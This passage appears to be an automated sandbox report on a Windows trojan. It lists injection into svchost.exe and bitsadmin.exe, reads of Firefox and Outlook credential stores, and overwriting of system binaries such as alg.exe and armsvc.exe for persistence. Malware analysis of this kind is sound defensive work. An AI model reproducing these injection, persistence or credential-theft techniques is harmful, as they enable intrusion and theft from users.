                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030EF0CC3_2_030EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030470C03_2_030470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030F70E93_2_030F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030FF0E03_2_030FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030FF7B03_2_030FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030856303_2_03085630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030F16CC3_2_030F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030F75713_2_030F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030DD5B03_2_030DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031095C33_2_031095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030FF43F3_2_030FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030314603_2_03031460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030FFB763_2_030FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305FB803_2_0305FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B5BF03_2_030B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0307DBF93_2_0307DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030FFA493_2_030FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030F7A463_2_030F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B3A6C3_2_030B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030DDAAC3_2_030DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03085AA03_2_03085AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030E1AA33_2_030E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030EDAC63_2_030EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030D59103_2_030D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030499503_2_03049950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305B9503_2_0305B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030AD8003_2_030AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030438E03_2_030438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030FFF093_2_030FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03041F923_2_03041F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030FFFB13_2_030FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03049EB03_2_03049EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03043D403_2_03043D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030F1D5A3_2_030F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030F7D733_2_030F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305FDC03_2_0305FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B9C323_2_030B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030FFCF23_2_030FFCF2
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: String function: 00407DE1 appears 35 times
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: String function: 00428900 appears 41 times
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: String function: 00420AE3 appears 70 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03075130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0302B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03087E54 appears 111 times
                Source: uG3I84bQEr.exe, 00000000.00000003.2236890477.0000000004DED000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs uG3I84bQEr.exe
                Source: uG3I84bQEr.exe, 00000000.00000003.2232408790.0000000004C43000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs uG3I84bQEr.exe
                Source: uG3I84bQEr.exe, 00000000.00000003.2231083417.0000000003F20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameALG.exej% vs uG3I84bQEr.exe
                Source: uG3I84bQEr.exe, 00000000.00000003.2222843624.0000000003EC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamearmsvc.exeN vs uG3I84bQEr.exe
                Source: uG3I84bQEr.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: uG3I84bQEr.exeStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: armsvc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: alg.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: AppVClient.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: uG3I84bQEr.exeStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: armsvc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: alg.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: AppVClient.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winEXE@9/9@6/6
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_0046A06A GetLastError,FormatMessageW,0_2_0046A06A
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_004581CB AdjustTokenPrivileges,CloseHandle,0_2_004581CB
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_004587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_004587E1
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_0046B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0046B333
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_0047EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0047EE0D
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_0046C397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_0046C397
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00404E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00404E89
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00B7CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,0_2_00B7CBD0
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeFile created: C:\Users\user\AppData\Roaming\698ab73320bfb682.binJump to behavior
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-698ab73320bfb682-inf
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-698ab73320bfb682ef280244-b
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeFile created: C:\Users\user\AppData\Local\Temp\autF5B2.tmpJump to behavior
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: bitsadmin.exe, 00000007.00000002.3470880703.0000000002EBB000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000003.2703170828.0000000002E69000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000003.2705828064.0000000002E96000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3470880703.0000000002E8D000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000003.2703170828.0000000002E8D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: uG3I84bQEr.exeReversingLabs: Detection: 81%
                Source: uG3I84bQEr.exeVirustotal: Detection: 80%
                Source: unknownProcess created: C:\Users\user\Desktop\uG3I84bQEr.exe "C:\Users\user\Desktop\uG3I84bQEr.exe"
                Source: unknownProcess created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\uG3I84bQEr.exe"
                Source: unknownProcess created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
                Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\SysWOW64\bitsadmin.exe"
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\uG3I84bQEr.exe"Jump to behavior
                Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\SysWOW64\bitsadmin.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\alg.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\alg.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\alg.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: uG3I84bQEr.exeStatic file information: File size 1762816 > 1048576
                Source: uG3I84bQEr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: uG3I84bQEr.exe, 00000000.00000003.2222768330.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe.0.dr
                Source: Binary string: AppVClient.pdbGCTL source: AppVClient.exe.0.dr
                Source: Binary string: ALG.pdbGCTL source: uG3I84bQEr.exe, 00000000.00000003.2230957247.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
                Source: Binary string: AppVClient.pdb source: AppVClient.exe.0.dr
                Source: Binary string: bitsadmin.pdb source: svchost.exe, 00000003.00000003.2473240347.0000000002A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2473112981.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, bGPwjAWMEtES.exe, 00000006.00000003.2585902954.000000000120F000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: bitsadmin.pdbGCTL source: svchost.exe, 00000003.00000003.2473240347.0000000002A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2473112981.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, bGPwjAWMEtES.exe, 00000006.00000003.2585902954.000000000120F000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: bGPwjAWMEtES.exe, 00000006.00000000.2420600558.0000000000DDE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: uG3I84bQEr.exe, 00000000.00000003.2241132548.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, uG3I84bQEr.exe, 00000000.00000003.2240783345.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2404949163.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2402704463.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2506027142.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2506027142.000000000319E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000003.2505813590.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3472349017.00000000033FE000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3472349017.0000000003260000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000003.2513176646.00000000030B5000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: uG3I84bQEr.exe, 00000000.00000003.2241132548.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, uG3I84bQEr.exe, 00000000.00000003.2240783345.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000003.00000003.2404949163.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2402704463.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2506027142.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2506027142.000000000319E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000003.2505813590.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3472349017.00000000033FE000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3472349017.0000000003260000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000003.2513176646.00000000030B5000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: ALG.pdb source: uG3I84bQEr.exe, 00000000.00000003.2230957247.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
                Source: alg.exe.0.drStatic PE information: 0xF67E8745 [Tue Jan 18 10:28:21 2101 UTC]
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00404B37 LoadLibraryA,GetProcAddress,0_2_00404B37
                Source: AppVClient.exe.0.drStatic PE information: real checksum: 0xcd10f should be: 0x153c1a
                Source: armsvc.exe.0.drStatic PE information: section name: .didat
                Source: alg.exe.0.drStatic PE information: section name: .didat
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00428945 push ecx; ret 0_2_00428958
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00402F12 push es; retf 0_2_00402F13
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00B5B180 push 00B5B0CAh; ret 0_2_00B5B061
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00B5B180 push 00B5B30Dh; ret 0_2_00B5B1E6
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00B5B180 push 00B5B2F2h; ret 0_2_00B5B262
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00B5B180 push 00B5B255h; ret 0_2_00B5B2ED
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00B5B180 push 00B5B2D0h; ret 0_2_00B5B346
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00B5B180 push 00B5B37Fh; ret 0_2_00B5B3B7
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00B78550 push 00B7852Eh; ret 0_2_00B77F3A
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00B78550 push 00B78514h; ret 0_2_00B77F66
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00B78550 push 00B77E66h; ret 0_2_00B78057
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00B78550 push 00B7817Ah; ret 0_2_00B7808B
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00B78550 push 00B782E5h; ret 0_2_00B780D9
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00B78550 push 00B7826Ah; ret 0_2_00B7819E
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00B78550 push 00B7849Ch; ret 0_2_00B781E4
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00B78550 push 00B78321h; ret 0_2_00B782E0
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00B78550 push 00B77FBFh; ret 0_2_00B7831F
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00B78550 push 00B77FA8h; ret 0_2_00B7834C
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00B78550 push 00B784BAh; ret 0_2_00B783E2
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00B78550 push 00B78426h; ret 0_2_00B784D8
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00B78550 push 00B78075h; ret 0_2_00B784FD
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00B78550 push 00B7808Ch; ret 0_2_00B78512
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00B78550 push 00B78B6Fh; ret 0_2_00B78596
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00B78550 push 00B78E94h; ret 0_2_00B785C9
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00B78550 push 00B7878Bh; ret 0_2_00B78734
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00B78550 push 00B78D45h; ret 0_2_00B787D3
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00B78550 push 00B78E5Fh; ret 0_2_00B7885F
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00B78550 push 00B78AB5h; ret 0_2_00B78B13
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00B78550 push 00B78784h; ret 0_2_00B78CA1
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00B78550 push 00B78DC9h; ret 0_2_00B78E1C
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00B78550 push 00B78D14h; ret 0_2_00B78E2E
                Source: uG3I84bQEr.exeStatic PE information: section name: .reloc entropy: 7.9380417991201515
                Source: AppVClient.exe.0.drStatic PE information: section name: .reloc entropy: 7.943011846665762

                Persistence and Installation Behavior

                barindex
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
